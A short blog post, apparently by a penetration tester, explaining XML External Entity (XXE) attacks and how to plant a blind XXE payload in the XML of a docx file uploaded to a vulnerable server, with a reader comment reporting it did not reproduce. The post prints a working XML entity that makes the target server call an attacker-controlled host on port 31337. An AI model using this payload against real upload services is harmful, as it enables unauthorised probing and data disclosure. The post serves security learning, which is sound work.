Exploit XXE Vulnerability Using Docx File

Exploit XXE Vulnerability Using Docx File

Today, I found a vulnerability on a server which is has feature upload for docx file. I will try to explain how to exploit XXE vulnerability using docx file and how to find this vulnerability.

So..

What is XXE Vulnerability?

An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.
Source: owasp.org

[wp_ad_camp_1]

 

Why this vulnerability happens?

XML Entities could request into external server. By using this feature, we can command the server to send some sensitive information to our server.

Crafting The Weapon

“Why don’t you use a tool or just using oxmlxxe.”?

Yes, it is a great tool for XXE but this is about learning, right? Please stop talking about pentesting in 3 hours for 1 project. PLEASE STOP IT!!!!!

Pentesting Super Elite Hacker

Ahh.. forget it.. lets get back to the topic..

First, I tried to build a docx file (I am using LibreOffice).

XXE docx exploit

And then lets extract the docx file and put our exploit in it.

This is the blind exploit I used to verify if the server is vulnerable:

<!DOCTYPE pv8 [
 <!ELEMENT pv8 ANY >
 <!ENTITY pv8xxe SYSTEM "http://xxx.xxx.xxx.xxx:31337/">]>
<pv8>&pv8xxe;</pv8>

Here is the full XML :

XXE Payload on docx file

Now, run a web server to receive the requests from the vulnerable server.

Run web server

And, lets upload the file and wait for the requests. If the target server is sending request to our server, it means the target server is vulnerable to XXE.

Exploit XXE Vulnerability Using Docx File

After finish uploading our file, the page is showing an error.

XXE Error Document

But……..

XXE Reply Request

Yes, the target server is sending request to our server.

I will write full PoC when the vulnerability on the target server is patched.

Thanks and happy hacking. 🙂

1 thought on “Exploit XXE Vulnerability Using Docx File”

  1. I can’t reproduce it. I get a SAXException: [word/document.xml line 5]: entity ‘pv8xxe’ is not defined

    LIbreOffice Version: 6.4.6.2

Leave a Comment

Your email address will not be published. Required fields are marked *